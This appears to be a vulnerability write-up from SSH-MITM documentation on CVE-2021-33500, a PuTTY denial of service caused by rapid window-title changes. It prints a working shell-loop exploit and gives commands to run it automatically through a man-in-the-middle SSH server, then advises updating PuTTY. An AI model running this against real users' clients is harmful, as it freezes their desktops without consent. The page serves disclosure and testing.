CVE-2021-33500

CVE-2021-33500
7.5 CVSS
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H https://nvd.nist.gov/vuln/detail/CVE-2021-33500

integrated in SSH-MITM plugins

PuTTY before 0.75 on Windows allows remote servers to cause a denial of service (Windows GUI hang) by telling the PuTTY window to change its title repeatedly at high speed, which results in many SetWindowTextA or SetWindowTextW calls.

NOTE: the same attack methodology may affect some OS-level GUIs on Linux or other platforms for similar reasons.

Affected Software:
  • PuTTY < 0.75

Description

A vulnerability in PuTTY < 0.75 freezes the entire, leading inevitably to a manual restart. This happens when executing a simple command to repeatedly change the terminals title.

Set window title from terminal:

$ PS1=''
echo -ne "\033]0; NEW_TITLE \007"

Thus, an working exploit would be:

$ PS1=''
while :
> do
> echo -ne "\033]0; NEW_TITLE${RANDOM}  \007"
> done

Using the injection functionality of the mitm Server, this exploit can be executed immediately when a client connects to the mitm server via PuTTY.

Test with SSH-MITM

A proof of conecpt exploit is integrated in the extra package ssh-mitm-plugins.

You can install the required extra packages with following command:

$ pip install ssh-mitm[plugins]

After installing the plugins you can start ssh-mitm:

$ ssh-mitm --ssh-interface puttydos

When you have logged in with PuTTY to the ssh-mitm server, ssh-mitm executed the exploit and PuTTY will freeze the desktop.

Mitigation

Update PuTTY to version >= 0.75